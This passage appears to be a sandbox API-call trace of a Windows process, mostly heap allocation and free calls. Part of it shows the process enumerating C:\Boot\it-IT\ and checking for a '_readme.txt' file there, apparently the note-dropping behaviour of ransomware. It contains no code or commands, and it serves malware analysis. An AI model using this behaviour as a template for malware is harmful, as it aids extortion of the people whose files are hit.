out: hHeap=0x6e0000) returned 1 [0146.550] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.550] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.550] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.550] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.550] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.550] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.550] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.550] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.550] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.550] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.550] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.550] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.550] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.550] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.550] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.550] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.550] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.550] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.550] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.551] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.551] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.551] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.551] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.551] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.551] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.551] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.551] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.551] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.551] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.551] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.551] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.551] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.551] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.551] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.551] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.551] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.551] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.551] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.551] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.551] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.551] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.551] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.551] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.551] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.551] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.551] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.551] PathFindFileNameW (pszPath="C:\\Boot\\it-IT\\") returned="it-IT\\" [0146.551] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.551] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.551] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.551] PathFindFileNameW (pszPath="") returned="" [0146.551] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.551] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.552] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.552] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.552] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.552] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328ec10 [0146.552] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.552] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.552] PathAppendW (in: pszPath="C:\\Boot\\it-IT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0146.552] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.552] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.552] PathFileExistsW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0146.554] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.554] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.554] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.554] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.554] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.554] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.554] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb6bcb0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.554] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb6bcb0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.554] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.554] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.554] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.554] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.554] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.554] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.554] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.554] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.554] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.554] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.554] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.554] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.554] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.554] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.554] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.555] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.555] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.555] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.555] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.555] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.555] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.555] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.555] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.555] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.555] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.555] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.555] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.555] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.555] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.555] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.555] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.555] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.555] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.555] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.555] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.555] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.555] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.555] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.555] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.555] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.555] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.555] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.555] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.555] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.555] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.555] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.555] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.555] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.556] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.556] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.556] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.556] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.556] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.556] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.556] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.556] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.556] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.556] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.556] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.556] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.556] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.556] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.556] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.556] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.556] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.556] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.556] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.556] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.556] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.556] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.556] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.556] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.556] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.556] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.556] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.556] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.556] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.556] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.556] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.556] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.556] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.556] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.556] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.556] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.556] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.557] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.557] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.557] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.557] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.557] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.557] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.557] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.557] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.557] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.557] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.557] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.557] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.557] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.557] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.557] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.557] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.557] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.557] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.557] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.557] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.557] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.557] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.557] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.557] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.557] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.557] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.557] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.557] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.557] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.557] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.557] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.557] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.557] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.557] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.557] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.557] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.557] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.557] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.558] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.558] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.558] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.558] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.558] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.558] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.558] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.558] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.558] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.558] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.558] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.558] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.558] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.558] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.558] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.558] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.558] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.558] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.558] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.558] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.558] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.558] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.558] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.558] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.558] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.558] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.558] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.558] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.558] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.558] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, 